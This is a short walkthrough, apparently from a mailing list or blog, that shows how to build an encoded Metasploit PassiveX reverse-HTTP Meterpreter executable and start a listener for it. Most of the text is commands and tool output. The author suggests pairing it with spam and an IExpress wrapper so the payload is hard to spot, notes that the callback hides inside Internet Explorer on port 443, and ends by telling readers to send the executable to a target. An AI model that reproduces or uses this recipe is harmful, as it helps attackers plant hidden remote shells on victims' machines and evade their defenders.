I posted this walkthrough to the Metasploit mailing list, but thought that it would serve well here as well. Especially with the recent iPhone 3.0 “Special” download spam I recently received. The binary comes out to a whopping 97 bytes for the stager. Would be a blazing fast download and coupled with the IExpress “hack” would make for an very hard to spot payload.

A really down and dirty explination of what PassiveX is and why it's useful in this sort of situation is that instead of making a direct connection back to you, it uses an iexplorer process with a cool ActiveX control to talk back. So someone looking for a rogue process will only see Internet Explorer open and talking over port 443 (as specified).

(props to skape for writting PassiveX and @_natron_ for kicking in the latest tweaks to make it work with IE7/IE8)

Here are the options for msfpayload:

Usage: ./msfpayload <payload> [var=val] <S[ummary]|C|P[erl]|[Rub]y|R[aw]|J[avascript]|e[X]ecutable|[V]BA>

And msfencode's options if you chose to use it as I demonstrate below. However, encoding happens by default with msfpayload (IIRC):

./msfencode -h

Usage: ./msfencode <options>

OPTIONS:

-a <opt>  The architecture to encode as
-b <opt>  The list of characters to avoid: '\x00\xff'
-c <opt>  The number of times to encode the data
-e <opt>  The encoder to use
-h        Help banner
-i <opt>  Encode the contents of the supplied file path
-l        List available encoders
-m <opt>  Specifies an additional module search path
-n        Dump encoder information
-o <opt>  The output file
-s <opt>  The maximum size of the encoded data
-t <opt>  The format to display the encoded buffer with (c, elf, exe, java, perl, raw, ruby, vba)

Here we create the PassiveX payload. Note the PX options instead of the LHOST/LPORT:

./msfpayload windows/reflectivemeterpreter/reverse_http PXHOST=192.168.1.100 PXPORT=443 PXURI=/ R | ./msfencode -t exe -o /tmp/maliciouspayload.exe

[*] x86/shikata_ga_nai succeeded with size 97 (iteration=1)

Now that we have our "malicious payload" in /tmp we get our listener ready (you can use msfcli as well, I just like msfconsole because it provides me more flexibility):

./msfconsole

_
| |      o
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
|  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|

=[ msf v3.3-dev
+ -- --=[ 376 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 153 aux

msf > use multi/handler
msf exploit(handler) > exploit -h

(I'm showing you 'exploit's options because a lot of people don't know they exist. With two lines you can start your listener (use, then exploit):

Usage: exploit [options]
Launches an exploitation attempt.

OPTIONS:
-e <opt>  The payload encoder to use.  If none is specified, ENCODER is used.
-h        Help banner.
-j        Run in the context of a job.
-n <opt>  The NOP generator to use.  If none is specified, NOP is used.
-o <opt>  A comma separated list of options in VAR=VAL format.
-p <opt>  The payload to use.  If none is specified, PAYLOAD is used.
-t <opt>  The target index to use.  If none is specified, TARGET is used.
-z        Do not interact with the session after successful exploitation.

msf exploit(handler) > exploit -j -z -p windows/reflectivemeterpreter/reverse_http -o PXHOST=0.0.0.0,PXPORT=443,PXURI=/,ExitOnSession=False

[*] Exploit running as background job.
[*] PassiveX listener started.
[*] Starting the payload handler...

msf exploit(handler) >

Listener ready to go. I chose IP: 0.0.0.0 just to make things easy. Just send off maliciouspayload.exe to your target and you're set.